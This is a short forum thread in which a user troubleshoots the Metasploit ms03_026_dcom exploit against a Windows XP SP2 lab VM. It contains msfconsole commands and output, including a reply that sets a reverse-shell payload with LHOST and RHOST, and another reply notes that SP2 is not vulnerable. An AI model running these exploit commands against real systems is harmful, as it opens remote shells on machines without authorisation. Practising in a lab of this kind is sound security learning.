Results 1 to 6 of 6

Thread: exploit(ms03_026_dcom)

Hybrid View

  1. #1
    Just burned his ISO
    Join Date
    Feb 2011

    Default exploit(ms03_026_dcom)

    Hi all,

    I am trying to follow on of the tutorial for metasploit.

    on my virtualbox, i have Backtrack 5R1 and window XP professional, version :5.1.2600 service pack 2 build 2600.
    after running the exploit as per below:
    msf exploit(ms03_026_dcom) > show options

    Module options (exploit/windows/dcerpc/ms03_026_dcom):

    Name Current Setting Required Description
    ---- --------------- -------- -----------
    RHOST yes The target address
    RPORT 135 yes The target port

    Exploit target:

    Id Name
    -- ----
    0 Windows NT SP3-6a/2000/XP/2003 Universal
    msf exploit(ms03_026_dcom) > set PAYLOAD windows/meterpreter/bind_tcp
    PAYLOAD => windows/meterpreter/bind_tcp
    msf exploit(ms03_026_dcom) > exploit[*] Started bind handler[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:[135] ...[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:[135] ...[*] Sending exploit ...[*] Exploit completed, but no session was created.
    nothing happened.

    Can anyone give some advise please?
    thanks in advance

  2. #2
    Just burned his ISO
    Join Date
    Jan 2011

    Default Re: exploit(ms03_026_dcom)

    just to let you know but the correct way to use this is[

    msf > use exploit/windows/dcerpc/ms03_026_dcom
     msf exploit(ms03_026_dcom) > show payloads
     msf exploit(ms03_026_dcom) > set PAYLOAD generic/shell_reverse_tcp
     msf exploit(ms03_026_dcom) > set LHOST [MY IP ADDRESS]
     msf exploit(ms03_026_dcom) > set RHOST [TARGET IP]
     msf exploit(ms03_026_dcom) > exploit
    we so the offical site says anyways , good luck .

  3. #3
    Just burned their ISO
    Join Date
    Oct 2012

    Default Re: exploit(ms03_026_dcom)

    this is what I was looking for! I got BT5R3 and have xp vista and other vms set up for attack and didn't really know how to execute after running exploit!

  4. #4
    Just burned his ISO
    Join Date
    Feb 2011

    Default Re: exploit(ms03_026_dcom)

    Thanks loveablerouge for your kind reply, but still the same
    Can anyone advise?

  5. #5
    Member shadowzero's Avatar
    Join Date
    Jun 2011

    Default Re: exploit(ms03_026_dcom)

    According to this, Windows XP Professional SP2 is not vulnerable:

  6. #6
    Just burned his ISO
    Join Date
    Feb 2011

    Default Re: exploit(ms03_026_dcom)

    yes, you are right shadowzero.
    thanks man

Similar Threads

  1. problemi metasploit - exploit - exploit-db
    By wlf89ok in forum Angolo dei Newbie
    Replies: 5
    Last Post: 02-05-2011, 10:16 PM
  2. Replies: 3
    Last Post: 10-24-2010, 10:22 PM
  3. Metasploit Question - ms03_026_dcom - shell_bind_tcp
    By >Dart> in forum Experts Forum
    Replies: 1
    Last Post: 08-19-2010, 08:20 AM
  4. Replies: 1
    Last Post: 06-25-2010, 02:49 AM
  5. Replies: 0
    Last Post: 03-24-2010, 10:01 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts